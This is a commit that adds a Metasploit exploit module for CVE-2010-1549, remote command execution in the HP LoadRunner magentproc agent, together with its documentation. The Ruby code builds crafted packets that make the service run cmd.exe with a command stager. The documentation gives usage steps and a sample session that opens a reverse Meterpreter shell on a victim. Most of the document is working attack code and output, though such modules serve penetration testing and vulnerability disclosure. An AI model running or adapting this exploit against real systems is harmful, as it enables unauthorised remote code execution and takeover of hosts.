land #9191 an exploit against HP LoadRunner magentproc
commit
3516305517
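--- /dev/null
+++ b/documentation/modules/exploit/windows/misc/hp_loadrunner_magentproc_cmdexec.md
@@ -0,0 +1,63 @@
+HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution (CVE-2010-1549)
+
+This module exploits a remote command execution vulnerablity in HP LoadRunner before 9.50 and also
+HP Performance Center before 9.50. By sending a specially crafted packet, an attacker can execute commands remotely.
+The service is vulnerable provided the Secure Channel feature is disabled (default).
+
+During testing, additional versions were verified to be vulnerable. The following list documents them:
+
+- HP LoadRunner 12.53 Community Edition (non-default SSL turned off)
+
+## Vulnerable Application
+
+HP LoadRunner 9.50 or below, or a version documented above.
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: ```use exploit/windows/misc/hp_loadrunner_magentproc_cmdexec```
+4. Do: ```set RHOST [ip]```
+5. Do: ```run```
+6. You should get a shell.
+
+## Scenarios
+
+### Win7 OS with HP LoadRunner 12.53 Community Edition
+
+```
+msf > use exploit/windows/misc/hp_loadrunner_magentproc_cmdexec
+msf exploit(hp_loadrunner_magentproc_cmdexec) > set RHOST victim
+RHOST => victim
+msf exploit(hp_loadrunner_magentproc_cmdexec) > exploit
+
+[*] Started reverse TCP handler on 1.1.1.1:4444
+[*] victim:54345 - Sending payload...
+[*] victim:54345 - Command Stager progress - 1.47% done (1499/102292 bytes)
+[*] victim:54345 - Command Stager progress - 2.93% done (2998/102292 bytes)
+[*] victim:54345 - Command Stager progress - 4.40% done (4497/102292 bytes)
+[*] victim:54345 - Command Stager progress - 5.86% done (5996/102292 bytes)
+[*] victim:54345 - Command Stager progress - 7.33% done (7495/102292 bytes)
+...snip...
+[*] victim:54345 - Command Stager progress - 92.32% done (94437/102292 bytes)
+[*] victim:54345 - Command Stager progress - 93.79% done (95936/102292 bytes)
+[*] victim:54345 - Command Stager progress - 95.25% done (97435/102292 bytes)
+[*] victim:54345 - Command Stager progress - 96.72% done (98934/102292 bytes)
+[*] victim:54345 - Command Stager progress - 98.15% done (100400/102292 bytes)
+[*] victim:54345 - Command Stager progress - 99.55% done (101827/102292 bytes)
+[*] victim:54345 - Command Stager progress - 100.00% done (102292/102292 bytes)
+[*] Sending stage (179267 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:55556) at 2017-11-09 03:53:08 +1100
+
+meterpreter > sysinfo
+Computer : TARGET
+OS : Windows 7 (Build 7601, Service Pack 1).
+Architecture : x64
+System Language : en_AU
+Domain : DOMAIN
+Logged On Users : 3
+Meterpreter : x86/windows
+meterpreter >
+Background session 1? [y/N]
+
+```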
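--- /dev/null
+++ b/modules/exploits/windows/misc/hp_loadrunner_magentproc_cmdexec.rb
@@ -0,0 +1,99 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+Rank = ExcellentRanking
+
+include Msf::Exploit::Remote::Tcp
+include Msf::Exploit::CmdStager
+
+def initialize(info={})
+super(update_info(info,
+'Name' => "HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution",
+'Description' => %q{
+This module exploits a remote command execution vulnerablity in HP LoadRunner before 9.50
+and also HP Performance Center before 9.50. HP LoadRunner 12.53 and other versions are
+also most likely vulneable if the (non-default) SSL option is turned off.
+By sending a specially crafted packet, an attacker can execute commands remotely.
+The service is vulnerable provided the Secure Channel feature is disabled (default).
+},
+'License' => MSF_LICENSE,
+'Author' =>
+[
+'Unknown', # Original discovery # From Tenable Network Security
+'aushack' # metasploit module
+],
+'References' =>
+[
+['CVE', '2010-1549'],
+['ZDI', '10-080'],
+['BID', '39965'],
+['URL', 'https://support.hpe.com/hpsc/doc/public/display?docId=c00912968']
+],
+'Payload' => { 'BadChars' => "\x0d\x0a\x00" },
+'Platform' => 'win',
+'Targets' =>
+[
+# Note: software reportedly supports Linux - may also be vulnerable.
+['Windows (Dropper)',
+'Platform' => 'win',
+'Arch' => [ARCH_X86, ARCH_X64]
+],
+],
+'Privileged' => false,
+'Stance' => Msf::Exploit::Stance::Aggressive,
+'DisclosureDate' => 'May 06 2010',
+'DefaultTarget' => 0))
+
+register_options([Opt::RPORT(54345)])
+end
+
+def autofilter
+true
+end
+
+def execute_command(cmd, _opts = {})
+guid = Rex::Text.encode_base64(Rex::Text.rand_text_alphanumeric(17))
+randstr = Rex::Text.rand_text_alpha(16)
+server_name = Rex::Text.rand_text_alpha(7)
+server_ip = datastore['LHOST']
+server_port = Rex::Text.rand_text_numeric(4)
+# If linux is one day supported, cmd1 = /bin/sh and cmd2 = -c cmd
+cmd1 = "C:\\Windows\\system32\\cmd.exe"
+cmd2 = "/C \"#{cmd}\""
+
+pkt1 = [0x19].pack('N') + guid + '0'
+
+pkt2 = [0x6].pack('N') + [0x0].pack('N') + "(-server_type=8)(-server_name=#{server_name})(-server_full_name=#{server_name})"
+pkt2 << "(-server_ip_name=#{server_ip})(-server_port=#{server_port})(-server_fd_secondary=4)(-guid_identifier=#{guid})\x00\x00"
+pkt2 << [0x7530].pack('N')
+
+pkt3 = [4 + pkt2.length].pack('N') + pkt2
+
+pkt4 = [0x1c].pack('N') + [0x05].pack('N') + [0x01].pack('N') + randstr + pkt3
+
+pkt5 = [pkt4.length].pack('N') + pkt4
+
+pkt6 = [0x437].pack('N') + [0x0].pack('N') + [0x31].pack('N') + [1].pack('N') + [0x31000000].pack('N')
+pkt6 << [cmd1.length].pack('N') + cmd1 + "\x00" + [cmd2.length].pack('N') + cmd2 + [0x0].pack('N') + [0x0].pack('N')
+
+pkt7 = [4 + pkt6.length].pack('N') + pkt6
+
+pkt8 = [0x18].pack('N') + [0x04].pack('N') + randstr + pkt7
+
+pkt9 = [pkt8.length].pack('N') + pkt8
+
+sploit = pkt1 + pkt5 + pkt9
+
+connect
+sock.put(sploit)
+disconnect
+end
+
+def exploit
+print_status('Sending payload...')
+execute_cmdstager(linemax: 1500)
+end
+end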